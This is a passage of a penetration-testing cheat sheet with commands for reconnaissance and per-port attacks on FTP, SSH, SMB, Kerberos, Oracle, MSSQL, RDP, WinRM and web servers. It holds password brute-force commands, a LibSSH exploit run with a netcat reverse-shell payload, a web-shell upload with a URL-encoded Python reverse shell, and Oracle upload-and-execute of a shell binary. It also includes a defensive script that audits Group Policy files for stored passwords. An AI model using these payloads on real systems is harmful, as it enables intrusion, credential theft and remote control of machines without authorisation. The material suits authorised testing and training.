42 | * [Redis - 6379](#redis---6379)
43 | * [MsDeploy - 8172](#msdeploy---8172)
44 | * [Webdav](#webdav)
45 | * [Unknown ports](#unknown-ports)
46 | * [Port 80 - Web server](#port-80---web-server)
47 | * [Url brute force](#url-brute-force)
48 | * [Default/Weak login](#defaultweak-login)
49 | * [LFI/RFI](#lfirfi)
50 | * [SQL-Injection](#sql-injection)
51 | * [XSS](#xss)
52 | * [Sql-login-bypass](#sql-login-bypass)
53 | * [Bypass image upload restrictions](#bypass-image-upload-restrictions)
54 | * [Password brute force - last resort](#password-brute-force---last-resort)
55 | * [Vulnerability analysis](#vulnerability-analysis)
56 | * [BOF](#bof)
57 | * [Find xploits - Searchsploit and google](#find-xploits---searchsploit-and-google)
58 | * [Reverse Shells](#reverse-shells)
59 | * [Privilege escalation](#privilege-escalation)
60 | * [Common](#common-1)
61 | * [Set up Webserver](#set-up-webserver)
62 | * [Set up FTP Server](#set-up-ftp-server)
63 | * [Set up TFTP](#set-up-tftp)
64 | * [Linux](#linux)
65 | * [Useful commands](#useful-commands)
66 | * [Basic info](#basic-info)
67 | * [Kernel exploits](#kernel-exploits)
68 | * [Programs running as root](#programs-running-as-root)
69 | * [Installed software](#installed-software)
70 | * [Weak/reused/plaintext passwords](#weakreusedplaintext-passwords)
71 | * [Inside service](#inside-service)
72 | * [Suid misconfiguration](#suid-misconfiguration)
73 | * [Unmounted filesystems](#unmounted-filesystems)
74 | * [Cronjob](#cronjob)
75 | * [SSH Keys](#ssh-keys)
76 | * [Bad path configuration](#bad-path-configuration)
77 | * [Find plain passwords](#find-plain-passwords)
78 | * [Scripts](#scripts)
79 | * [SUID](#suid)
80 | * [PS Monitor for cron](#ps-monitor-for-cron)
81 | * [Linux Privesc Tools](#linux-privesc-tools)
82 | * [Linux Precompiled Exploits](#linux-precompiled-exploits)
83 | * [Windows](#windows)
84 | * [Basic info](#basic-info-1)
85 | * [Kernel exploits](#kernel-exploits-1)
86 | * [Cleartext passwords](#cleartext-passwords)
87 | * [Reconfigure service parameters](#reconfigure-service-parameters)
88 | * [Dump process for passwords](#dump-process-for-passwords)
89 | * [Inside service](#inside-service-1)
90 | * [Programs running as root/system](#programs-running-as-rootsystem)
91 | * [Installed software](#installed-software-1)
92 | * [Scheduled tasks](#scheduled-tasks)
93 | * [Weak passwords](#weak-passwords)
94 | * [Add user and enable RDP](#add-user-and-enable-rdp)
95 | * [Powershell sudo for Windows](#powershell-sudo-for-windows)
96 | * [Windows download with bitsadmin](#windows-download-with-bitsadmin)
97 | * [Windows download with certutil.exe](#windows-download-with-certutilexe)
98 | * [Windows download with powershell](#windows-download-with-powershell)
99 | * [Windows Download from FTP](#windows-download-from-ftp)
100 | * [Windows create SMB Server transfer files](#windows-create-smb-server-transfer-files)
101 | * [Windows download with VBS](#windows-download-with-vbs)
102 | * [Windowss XP SP1 PrivEsc](#windowss-xp-sp1-privesc)
103 | * [Pass The Hash](#pass-the-hash)
104 | * [Scripts](#scripts-1)
105 | * [Useradd](#useradd)
106 | * [Powershell Run As](#powershell-run-as)
107 | * [Powershell Reverse Shell](#powershell-reverse-shell)
108 | * [Windows privesc/enum tools](#windows-privescenum-tools)
109 | * [Windows precompiled exploits](#windows-precompiled-exploits)
110 | * [Windows Port Forwarding](#windows-port-forwarding)
111 | * [Loot](#loot)
112 | * [Linux](#linux-1)
113 | * [Proof](#proof)
114 | * [Network secret](#network-secret)
115 | * [Passwords and hashes](#passwords-and-hashes)
116 | * [Dualhomed](#dualhomed)
117 | * [Tcpdump](#tcpdump)
118 | * [Interesting files](#interesting-files)
119 | * [Databases](#databases)
120 | * [SSH-Keys](#ssh-keys-1)
121 | * [Browser](#browser)
122 | * [Mail](#mail)
123 | * [GUI](#gui)
124 | * [Windows](#windows-1)
125 | * [Proof](#proof-1)
126 | * [Passwords and hashes](#passwords-and-hashes-1)
127 | * [Dualhomed](#dualhomed-1)
128 | * [Tcpdump](#tcpdump-1)
129 | * [Interesting files](#interesting-files-1)
130 |
131 | # **Recon**
132 |
133 | ```
134 | # Enumerate subnet
135 | nmap -sn 10.11.1.1/24
136 |
137 | # Fast simple scan
138 | nmap -sS 10.11.1.111
139 |
140 | # Full complete slow scan with output
141 | nmap -v -sT -A -T4 -p- -Pn --script vuln -oA full 10.11.1.111
142 |
143 | # Autorecon
144 | python3 autorecon.py 10.11.1.111
145 |
146 | # OneTwoPunch
147 | https://raw.githubusercontent.com/superkojiman/onetwopunch/master/onetwopunch.sh
148 | onetwopunch.sh ip.txt tcp
149 |
150 | # Scan for UDP
151 | nmap 10.11.1.111 -sU
152 | unicornscan -mU -v -I 10.11.1.111
153 |
154 | # Connect to udp if one is open
155 | nc -u 10.11.1.111 48772
156 |
157 | # Responder
158 | responder -I eth0 -A
159 |
160 | # Amass
161 | amass enum -ip 10.11.1.1/24
162 |
163 | ```
164 | - sparta
165 | - `python /root/Reconnoitre/Reconnoitre/reconnoitre.py -t 10.11.1.111 -o test --services`
166 |
167 |
168 | ## Enumeration AIO
169 | [Penetration Testing Methodology - 0DAYsecurity.com](http://0daysecurity.com/penetration-testing/enumeration.html)
170 |
171 | ## File enumeration
172 |
173 | ### Common
174 |
175 | ```bash
176 | # Check real file type
177 | file file.xxx
178 |
179 | # Analyze strings
180 | strings file.xxx
181 | strings -a -n 15 file.xxx # Check the entire file and outputs strings longer than 15 chars
182 |
183 | # Check embedded files
184 | binwalk file.xxx # Check
185 | binwalk -e file.xxx # Extract
186 |
187 | # Check as binary file in hex
188 | ghex file.xxx
189 |
190 | # Check metadata
191 | exiftool file.xxx
192 |
193 | # Stego tool for multiple formats
194 | wget https://embeddedsw.net/zip/OpenPuff_release.zip
195 | unzip OpenPuff_release.zip -d ./OpenPuff
196 | wine OpenPuff/OpenPuff_release/OpenPuff.exe
197 | ```
198 |
199 | ### Disk files
200 |
201 | ```bash
202 | # guestmount can mount any kind of disk file
203 | sudo apt-get install libguestfs-tools
204 | guestmount --add yourVirtualDisk.vhdx --inspector --ro /mnt/anydirectory
205 | ```
206 |
207 | ### Images
208 |
209 | ```bash
210 | # Stego
211 | wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar
212 | chmod +x stegsolve.jar
213 | java -jar stegsolve.jar
214 |
215 | # Stegpy
216 | stegpy -p file.png
217 |
218 | # Check png corrupted
219 | pngcheck -v image.jpeg
220 |
221 | # Check what kind of image is
222 | identify -verbose image.jpeg
223 | ```
224 |
225 | ### Audio
226 |
227 | ```bash
228 | # Check spectrogram
229 | wget https://code.soundsoftware.ac.uk/attachments/download/2561/sonic-visualiser_4.0_amd64.deb
230 | dpkg -i sonic-visualiser_4.0_amd64.deb
231 |
232 | # Check for Stego
233 | hideme stego.mp3 -f && cat output.txt #AudioStego
234 | ```
235 |
236 |
237 |
238 | ## Port 21 - FTP
239 |
240 | ```bash
241 | nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.11.1.111
242 | ```
243 |
244 | ## Port 22 - SSH
245 |
246 | - If you have usernames test login with username:username
247 | - Vulnerable Versions: 7.2p1
248 |
249 | ```
251 | nc 10.11.1.111 22
252 |
253 | A user can ask to execute a command right after authentication, before their default command or shell is executed:
254 |
255 | $ ssh -v user@10.10.1.111 id
256 | ...
257 | Password:
258 | debug1: Authentication succeeded (keyboard-interactive).
259 | Authenticated to 10.10.1.111 ([10.10.1.1114]:22).
260 | debug1: channel 0: new [client-session]
261 | debug1: Requesting no-more-sessions@openssh.com
262 | debug1: Entering interactive session.
263 | debug1: pledge: network
264 | debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
265 | debug1: Sending command: id
266 | debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
267 | debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
268 | uid=1000(user) gid=100(users) groups=100(users)
269 | debug1: channel 0: free: client-session, nchannels 1
270 | Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
271 | Bytes per second: sent 43133.4, received 44349.5
272 | debug1: Exit status 0
273 |
274 | Check Auth Methods:
275 |
276 | $ ssh -v 10.10.1.111
277 | OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019
278 | ...
279 | debug1: Authentications that can continue: publickey,password,keyboard-interactive
280 |
281 | Force Auth Method:
282 |
283 | $ ssh -v 10.10.1.111 -o PreferredAuthentications=password
284 | ...
285 | debug1: Next authentication method: password
286 |
287 | BruteForce:
288 |
289 | patator ssh_login host=10.11.1.111 port=22 user=root 0=/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt password=FILE0 -x ignore:mesg='Authentication failed.'
290 | hydra -l user -P /usr/share/wordlists/password/rockyou.txt -e s ssh://10.10.1.111
291 | medusa -h 10.10.1.111 -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh
292 | ncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://10.10.1.111
293 |
294 | LibSSH Before 0.7.6 and 0.8.4 - LibSSH 0.7.6 / 0.8.4 - Unauthorized Access
295 | Id
296 | python /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 id
297 | Reverse
298 | python /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.1.111 80 >/tmp/f"
299 |
300 | SSH FUZZ
301 | https://dl.packetstormsecurity.net/fuzzer/sshfuzz.txt
302 |
303 | cpan Net::SSH2
304 | ./sshfuzz.pl -H 10.10.1.111 -P 22 -u user -p user
305 |
306 | use auxiliary/fuzzers/ssh/ssh_version_2
307 |
308 | SSH-AUDIT
309 | https://github.com/arthepsy/ssh-audit
310 |
311 | • https://www.exploit-db.com/exploits/18557 ~ Sysax 5.53 – SSH ‘Username’ Remote Buffer Overflow
312 | • https://www.exploit-db.com/exploits/45001 ~ OpenSSH < 6.6 SFTP – Command Execution
313 | • https://www.exploit-db.com/exploits/45233 ~ OpenSSH 2.3 < 7.7 – Username Enumeration
314 | • https://www.exploit-db.com/exploits/46516 ~ OpenSSH SCP Client – Write Arbitrary Files
315 |
316 | http://www.vegardno.net/2017/03/fuzzing-openssh-daemon-using-afl.html
317 |
318 |
319 | SSH Enum users < 7.7:
320 | https://github.com/six2dez/ssh_enum_script
321 | https://www.exploit-db.com/exploits/45233
322 | python ssh_user_enum.py --port 2223 --userList /root/Downloads/users.txt IP 2>/dev/null | grep "is a"
323 |
324 | ```
325 |
326 | ## Port 25 - Telnet
327 |
328 | ```
329 | nc -nvv 10.11.1.111 25
330 | HELO foo
331 |
332 | telnet 10.11.1.111 25
333 | VRFY root
334 |
335 | nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.11.1.111
336 | smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t 10.11.1.111
337 |
338 | Send an email without authentication:
339 |
340 | MAIL FROM:admin@admin.com
341 | RCPT TO:DestinationEmail@DestinationDomain.com
342 | DATA
343 | test
344 |
345 | .
346 |
347 | Receive:
348 | 250 OK
349 | ```
350 |
351 | ## Port 69 - UDP - TFTP
352 |
353 | This is used for tftp-server.
354 |
355 | - Vulnerable tftp-server versions: 1.3, 1.4, 1.9, 2.1, and a few more.
356 | - See also the checks listed for FTP on port 21.
357 |
358 | ```
359 | nmap -p69 --script=tftp-enum.nse 10.11.1.111
360 | ```
361 |
362 | ## Kerberos - 88
363 |
364 | ```
365 | - MS14-068
366 | - GetUserSPNs
367 | GET USERS:
368 |
369 | nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" IP
370 | use auxiliary/gather/kerberos_enumusers
371 |
372 | https://www.tarlogic.com/blog/como-funciona-kerberos/
373 | https://www.tarlogic.com/blog/como-atacar-kerberos/
374 |
375 | python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt
376 |
377 | https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/
378 | ```
379 |
380 | ## Port 110 - Pop3
381 |
382 | ```
383 | telnet 10.11.1.111
384 | USER pelle@10.11.1.111
385 | PASS admin
386 |
387 | or:
388 |
389 | USER pelle
390 | PASS admin
391 |
392 | # List all emails
393 | list
394 |
395 | # Retrieve a specific email, e.g. number 9
396 | retr 9
397 | ```
398 |
399 | ## Port 111 - Rpcbind
400 |
401 | ```
402 | rpcinfo -p 10.11.1.111
403 | rpcclient -U "" 10.11.1.111
404 | srvinfo
405 | enumdomusers
406 | getdompwinfo
407 | querydominfo
408 | netshareenum
409 | netshareenumall
410 | ```
411 |
412 |
413 | ## Port 135 - MSRPC
414 |
415 | Some versions are vulnerable.
416 |
417 | ```
418 | nmap 10.11.1.111 --script=msrpc-enum
419 | msf > use exploit/windows/dcerpc/ms03_026_dcom
420 | ```
421 |
422 | ## Port 139/445 - SMB
423 |
424 |
425 | ```
426 | nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 10.11.1.111
427 |
428 | nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 10.11.1.111
429 |
430 | enum4linux -a 10.11.1.111
431 |
432 | rpcclient -U "" 10.11.1.111
433 | srvinfo
434 | enumdomusers
435 | getdompwinfo
436 | querydominfo
437 | netshareenum
438 | netshareenumall
439 |
440 | smbclient -L 10.11.1.111
441 | smbclient //10.11.1.111/tmp
442 | smbclient \\\\10.11.1.111\\ipc$ -U john
443 | smbclient //10.11.1.111/ipc$ -U john
444 |
445 | winexe -U username //10.11.1.111 "cmd.exe" --system
446 |
447 | smbtree 10.11.1.111
448 |
449 | nmblookup -A 10.11.1.111
450 |
451 | smbmap -u victim -p s3cr3t -H 10.11.1.111
452 |
453 | Inside \Policies\{REG}\MACHINE\Preferences\Groups\Groups.xml you can find a user name and its encrypted password (cpassword attribute); decrypt it with "gpp-decrypt"
454 |
455 | Mount SMB in Linux:
456 |
457 | mount -t cifs -o username=user,password=password //10.11.1.111/share /mnt/share
458 | ```
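The Groups.xml note above describes the Group Policy Preferences cpassword problem. As an added example that is not from the original guide or from the gpp-decrypt tool, the following Python script walks any GPP preference XML (Groups, Services, ScheduledTasks, DataSources, Drives all use the same attribute) and reports every element that still carries a non-empty cpassword, so the credential can be removed rather than decrypted. The sample XML, GUIDs and account names are constructed.

```python
"""Audit Group Policy Preference XML for stored cpassword values.

Added example, not part of the original guide or of gpp-decrypt. The AES key
used for the cpassword attribute was published by Microsoft (MS14-025), so
every such attribute is effectively a cleartext credential readable by all
domain users. This script only lists them; it does not decrypt anything.
"""
import sys
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample resembling a real Groups.xml; the cpassword value is a
# made-up string and does not decrypt to anything.
SAMPLE_GROUPS_XML = """
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="svc_backup" image="2"
        changed="2020-01-22 10:15:04" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
                changeLogon="0" noChange="1" neverExpires="1"
                acctDisabled="0" userName="svc_backup"/>
  </User>
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="helpdesk" image="2">
    <Properties action="U" userName="helpdesk" cpassword=""/>
  </User>
</Groups>
"""


def find_cpasswords(xml_text: str, source: str = "Groups.xml") -> List[Dict[str, str]]:
    """Return one finding per element that carries a non-empty cpassword.

    The search is attribute-based over every element, so it works for all
    GPP preference types without knowing their element layout.
    """
    findings: List[Dict[str, str]] = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        cpassword = elem.attrib.get("cpassword", "")
        if not cpassword:
            continue  # attribute absent or empty: no stored secret
        # Different preference types name the account differently.
        account = (elem.attrib.get("userName")
                   or elem.attrib.get("runAs")
                   or elem.attrib.get("accountName")
                   or "<unknown>")
        findings.append({
            "file": source,
            "element": elem.tag,
            "account": account,
            "cpassword_length": str(len(cpassword)),
        })
    return findings


def audit_files(paths: List[str]) -> List[Dict[str, str]]:
    """Run find_cpasswords over each path; unreadable or invalid XML is skipped."""
    results: List[Dict[str, str]] = []
    for path in paths:
        try:
            with open(path, encoding="utf-8-sig") as fh:
                results.extend(find_cpasswords(fh.read(), source=path))
        except (OSError, ET.ParseError) as exc:
            print(f"skip {path}: {exc}", file=sys.stderr)
    return results


if __name__ == "__main__":
    # Usage: python gpp_audit.py <path to Groups.xml> [more .xml files]
    # With no arguments the constructed sample is scanned instead.
    found = audit_files(sys.argv[1:]) if len(sys.argv) > 1 else find_cpasswords(SAMPLE_GROUPS_XML)
    for f in found:
        print(f"{f['file']}: <{f['element']}> account={f['account']} "
              f"cpassword stored ({f['cpassword_length']} chars)")
```

Run it against the Policies share mounted read-only (for example via the cifs mount shown above); every hit is a credential that should be rotated and the preference item deleted, since removing the attribute from the XML does not invalidate the password that was already exposed.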
459 |
460 |
461 | ## Port 161/162 UDP - SNMP
462 |
463 | ```
464 | nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes 10.11.1.111
465 | snmp-check 10.11.1.111 -c public|private|community
466 |
467 | ```
468 |
469 | ## LDAP - 389,636
470 |
471 | ```
472 | ldapsearch -h 10.11.1.111 -p 389 -x -b "dc=mywebsite,dc=com"
473 | ldapsearch -x -h 10.11.1.111 -D 'DOMAIN\user' -w 'hash-password'
474 | ldapdomaindump 10.11.1.111 -u 'DOMAIN\user' -p 'hash-password'
475 | patator ldap_login host=10.10.1.111 1=/root/Downloads/passwords_ssh.txt user=hsmith password=FILE1 -x ignore:mesg='Authentication failed.'
476 | ```
477 |
478 | ## HTTPS - 443
479 |
480 | Read the actual SSL certificate to:
481 |
482 | - find potential vhost names worth requesting (the correct Host header to GET)
483 | - check whether the clock is skewed (certificate validity dates vs. current time)
484 | - collect any names that could be usernames for bruteforce/guessing.
485 |
486 | ```
487 | sslscan 10.11.1.111:443
488 | ./testssl.sh -e -E -f -p -S -P -c -H -U TARGET-HOST > OUTPUT-FILE.html
489 | nmap -sV --script=ssl-heartbleed 10.1.10.111
490 | mod_ssl / OpenSSL version: old versions are targets of the OpenFuck exploit
491 | ```
492 |
493 | ## 500 - ISAKMP IKE
494 |
495 | ```
496 | ike-scan 10.11.1.111
497 | ```
498 |
499 | ## 513 - Rlogin
500 |
501 | ```
502 | apt install rsh-client
503 | rlogin -l root 10.11.1.111
504 | ```
505 |
506 | ## 541 - FortiNet SSLVPN
507 |
508 | [Fortinet Ports Guide](https://help.fortinet.com/fos50hlp/54/Content/FortiOS/fortigate-ports-and-protocols-54/Images/FortiGate.png)
509 |
510 | [SSL VPN Leak](https://opensecurity.global/forums/topic/181-fortinet-ssl-vpn-vulnerability-from-may-2019-being-exploited-in-wild/?__cf_chl_jschl_tk__=42e37b31a0585f7dae3dbce18cafde7c39b81976-1578385705-0-AcuYzrPMO1OuMo59JSPYyzZjiXNbMAIl6sKiXwhQRbMUMZq1Kp3VmWqIVXWZdzTZgFCecXue1Z6xXxU-Rql_GT_ovKiar_-i0CUCKFS85bfNXnUzuOuIwomXje-kH87mNbVHzzh9ediRfVWbJjwtO-ttLEYi7quczLlHQk38UqcumrARs77RrK2mj9zOb8Uwhv6av4QZ9od4fgAIl-F4Kff26MPQjs4LRHsgk5zH6RVwFMP8NdOnCrrzkkGH6_R9Dtw89_QtiOsH1nKB0hBDbtJ2O9AkkMDqw7tl1ip_pVDfnw1lvaZtFq1sRqgYwpan-n6n9f58Xdjcj2UGFKdE32OS7Ete8X7RwXUV9FGUSOhAM5_iK0kMNJg3mskrFVQz0lONaZVvFRdf_1rp69J4oRVat1m7KIQEGpRDe4OvYUb7pfQkNKLcK5s_lVIj2SAJQQ)
511 |
512 | ## Port 554 - RTSP
513 |
514 | - Web interface, transfer images, streaming
515 |
516 |
517 | ## Port 1030/1032/1033/1038
518 |
519 | Used by RPC to connect in domain network.
520 |
521 | ## MSSQL - 1433
522 |
523 | ```
524 | nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.111
525 | use auxiliary/scanner/mssql/mssql_ping
526 | use auxiliary/scanner/mssql/mssql_login
527 | use exploit/windows/mssql/mssql_payload
528 | sqsh -S 10.11.1.111 -U sa
529 | xp_cmdshell 'date'
530 | go
531 |
532 | ```
533 |
534 | ## Port 1521 - Oracle
535 |
536 | ```
537 | oscanner -s 10.11.1.111 -P 1521
538 | tnscmd10g version -h 10.11.1.111
539 | tnscmd10g status -h 10.11.1.111
540 | nmap -p 1521 -A 10.11.1.111
541 | nmap -p 1521 --script=oracle-tns-version,oracle-sid-brute,oracle-brute
542 | MSF: good modules under auxiliary/admin/oracle and scanner/oracle
543 |
544 | ./odat-libc2.5-i686 all -s 10.11.1.111 -p 1521
545 | ./odat-libc2.5-i686 sidguesser -s 10.11.1.111 -p 1521
546 | ./odat-libc2.5-i686 passwordguesser -s 10.11.1.111 -p 1521 -d XE
547 |
548 | Upload reverse shell with ODAT:
549 | ./odat-libc2.5-i686 utlfile -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ shell.exe /root/shell.exe
550 |
551 | and run it:
552 | ./odat-libc2.5-i686 externaltable -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ shell.exe
553 |
554 |
555 | ```
556 |
557 | ## Port 2049 - NFS
558 |
559 | ```
560 | showmount -e 10.11.1.111
561 |
562 | If you find anything you can mount it like this:
563 |
564 | mount 10.11.1.111:/ /tmp/NFS
565 | mount -t nfs 10.11.1.111:/ /tmp/NFS
566 | ```
567 |
568 | ## Port 2100 - Oracle XML DB
569 |
570 | ```
571 | FTP:
572 | sys:sys
573 | scott:tiger
574 | ```
575 |
576 | Default passwords
577 | https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm
578 |
579 |
580 | ## 3306 - MySQL
581 |
582 | ```
583 | nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse 10.11.1.111 -p 3306
584 |
585 | mysql --host=10.11.1.111 -u root -p
586 |
587 | MYSQL UDF
588 | https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
589 | ```
590 |
591 | ## Port 3339 - Oracle web interface
592 |
593 |
594 | - Basic info about web service (apache, nginx, IIS)
595 |
596 | ## RDP - 3389
597 |
598 | ```
599 | nmap -p 3389 --script=rdp-vuln-ms12-020.nse
600 | rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.11.1.111
601 | rdesktop -u guest -p guest 10.11.1.111 -g 94%
602 | ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://10.11.1.111
603 | ```
604 |
605 | ## VNC - 5900
606 |
607 | ```
608 | nmap --script=vnc-info,vnc-brute,vnc-title -p 5900 10.11.1.111
609 | ```
610 |
611 | ## WinRM - 5985
612 |
613 | ```
614 | https://github.com/Hackplayers/evil-winrm
615 | gem install evil-winrm
616 | evil-winrm -i 10.11.1.111 -u Administrator -p 'password1'
617 | evil-winrm -i 10.11.1.111 -u Administrator -H 'hash-pass' -s /scripts/folder
618 | ```
619 |
620 | ## Redis - 6379
621 |
622 | ```
623 | https://github.com/Avinash-acid/Redis-Server-Exploit
624 | python redis.py 10.10.10.160 redis
625 | ```
626 |
627 | ## MsDeploy - 8172
628 |
629 | ```
630 | Microsoft IIS Deploy port
631 | IP:8172/msdeploy.axd
632 | ```
633 |
634 | ## Webdav
635 |
636 | ```
637 | davtest -cleanup -url http://target
638 | cadaver http://target
639 | ```
640 |
641 | ## Unknown ports
642 |
643 | - `amap -d 10.11.1.111 8000`
644 | - netcat: makes connections to ports. Can echo strings or give shells: `nc -nv 10.11.1.111 110`
645 | - sfuzz: can connect to TCP or UDP ports, keep a connection open instead of closing it, and use basic HTTP configurations
646 | - Try zone transfer for subdomains: `dig axfr @10.11.1.111 hostname.box`, `dnsenum 10.11.1.111`, `dnsrecon -d domain.com -t axfr`
647 |
648 | Try admin:admin, user:user
649 |
650 | ## Port 80 - Web server
651 |
652 | - Basics:
653 | - Navigate && robots.txt
654 | - Headers
655 | - Source Code
656 |
657 | ```
658 | # Nikto
659 | nikto -h http://10.11.1.111
660 |
661 | # Nikto with squid proxy
662 | nikto -h 10.11.1.111 -useproxy http://10.11.1.111:4444
663 |
664 | # CMS Explorer
665 | cms-explorer -url http://10.11.1.111 -type [Drupal, WordPress, Joomla, Mambo]
666 |
667 | # WPScan (vp = Vulnerable Plugins, vt = Vulnerable Themes, u = Users)
668 | wpscan --url http://10.11.1.111
669 | wpscan --url http://10.11.1.111 --enumerate vp
670 | wpscan --url http://10.11.1.111 --enumerate vt
671 | wpscan --url http://10.11.1.111 --enumerate u
672 | wpscan -e --url https://url.com
673 |
674 |
675 | Check IP behind WAF:
676 | https://IP.com/2020/01/22/discover-cloudflare-wordpress-ip/
677 | pingback.xml (XML-RPC methodCall; method name and the two URL parameters):
680 | pingback.ping
684 | http://10.0.0.1/hello/world
689 | https://IP.com/2020/01/22/hello-world/
694 |
695 | curl -X POST -d @pingback.xml https://ip.com/xmlrpc.php
696 |
697 | Enum User:
698 | for i in {1..50}; do curl -s -L -i https://ip.com/wordpress\?author=$i | grep -E -o "Location:.*" | awk -F/ '{print $NF}'; done
699 |
700 | # Joomscan
701 | joomscan -u http://10.11.1.111
702 | joomscan -u http://10.11.1.111 --enumerate-components
703 |
704 | # Get header
705 | curl -i 10.11.1.111
706 |
707 | # Get options
708 | curl -i -X OPTIONS 10.11.1.111
709 |
710 | # With PUT option enabled:
711 |
712 | nmap -p 80 10.1.10.111 --script http-put --script-args http-put.url='/test/rootme.php',http-put.file='/root/php-reverse-shell.php'
713 |
714 | curl -v -X PUT -d '' http://10.1.10.111/test/cmd.php
715 | && http://10.1.10.111/test/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%210.1.10.111%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
716 |
717 | # Get everything
718 | curl -i -L 10.11.1.111
719 | curl -i -H "User-Agent:Mozilla/4.0" http://10.11.1.111:8080
720 |
721 | # Check for title and all links
722 | curl 10.11.1.111 -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'
723 |
724 | # Look at page with just text
725 | curl 10.11.1.111 -s -L | html2text -width '99' | uniq
726 |
727 | # Check if it is possible to upload
728 | curl -v -X OPTIONS http://10.11.1.111/
729 | curl -v -X PUT -d '' http://10.11.1.111/test/shell.php
730 |
731 | # Simple curl POST request with login data
732 | curl -X POST http://10.11.1.11/centreon/api/index.php?action=authenticate -d 'username=centreon&password=wall'
733 |
734 | dotdotpwn.pl -m http -h 10.11.1.111 -M GET -o unix
735 |
736 | site:domain.com intext:user
737 |
738 |
739 | # Firebase
740 | https://github.com/Turr0n/firebase
741 | python3 firebase.py -p 4 --dnsdumpster -l file
742 |
743 | ```
744 |
745 | ### Url brute force
746 |
747 | ```
748 | # Ffuf
749 | ffuf -c -e '.htm','.php','.html','.js','.txt','.zip','.bak','.asp','.aspx','.xml','.log' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -u https://10.11.1.11/mvc/FUZZ
750 |
751 | # Dirb not recursive
752 | dirb http://10.11.1.111 -r -o dirb-10.11.1.111.txt
753 |
754 | # Wfuzz
755 | wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://10.11.1.11/FUZZ
756 |
757 | # GoBuster
758 | gobuster dir -u http://10.11.1.111 -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
759 | gobuster dir -e -u http://10.11.1.111/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
760 | gobuster dir -u http://10.11.1.111 -w /usr/share/seclists/Discovery/Web_Content/Top1000-RobotsDisallowed.txt
761 | gobuster dir -e -u http://10.11.1.111/ -w /usr/share/wordlists/dirb/common.txt
762 |
765 | ./dirsearch.py -u 10.10.10.157 -e php
766 |
767 | medusa -h 10.11.1.111 -u admin -P wordlist.txt -M http -m DIR:/test -T 10
768 |
769 | Crawl:
770 |
771 | dirhunt https://url.com/
772 | hakrawler https://url.com/
773 |
774 | Fuzzer:
775 |
776 | ffuf -recursion -c -e '.htm','.php','.html','.js','.txt','.zip','.bak','.asp','.aspx','.xml' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -u https://url.com/FUZZ
777 |
